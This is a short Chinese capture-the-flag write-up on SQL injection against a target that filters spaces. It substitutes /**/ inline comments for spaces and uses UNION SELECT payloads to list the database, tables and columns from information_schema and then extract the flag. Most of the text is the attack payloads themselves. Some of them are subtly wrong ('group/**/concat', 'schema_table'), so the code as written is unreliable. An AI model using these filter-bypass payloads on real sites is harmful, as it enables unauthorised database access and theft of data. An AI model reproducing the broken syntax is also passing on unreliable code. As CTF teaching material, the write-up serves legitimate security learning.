过滤空格
- 在输入1后,并不回显有效信息,考虑到应用注释符,注释符/**/为内联注释符,可以将空格过滤

- 可以判断该注入应为空格过滤,将所有的空格转化为/**/后进行查询flag,查询库名
-1/**/union/**/select/**/database()

- 查询该库名下的数据表
-1/**/union/**/select/**/1,group/**/concat(table_name)/**/from/**/information_schema.tables/**/where/**/schema_table='sqli'

得出表名为news 和 jesvlygabd - 然后查询jesvlygabd中的列名
-1/**/union/**/select/**/1,group/**/concat(column_name)/**/from/**/information_schema.columns/**/where/**/schema_table='sqli'/**/and/**/table_name='jesvlygabd'

得出列名为dlcrqcjudu - 查询该库该表该列的所有字段
-1/**/union/**/select/**/1,group/**/concat(dlcrqcjudu)/**/from/**/sqli.jesvlygabd

得出flag
本文介绍了一种特殊的SQL注入攻击方式,即如何绕过空格过滤进行数据库信息的获取。通过使用内联注释符/**/替代空格,成功地从目标数据库中提取了库名、表名及列名等关键信息。
2502

被折叠的 条评论
为什么被折叠?



